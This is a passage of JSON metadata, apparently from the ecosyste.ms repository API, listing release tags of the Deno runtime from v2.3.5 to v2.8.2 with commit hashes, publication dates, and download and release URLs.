ub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3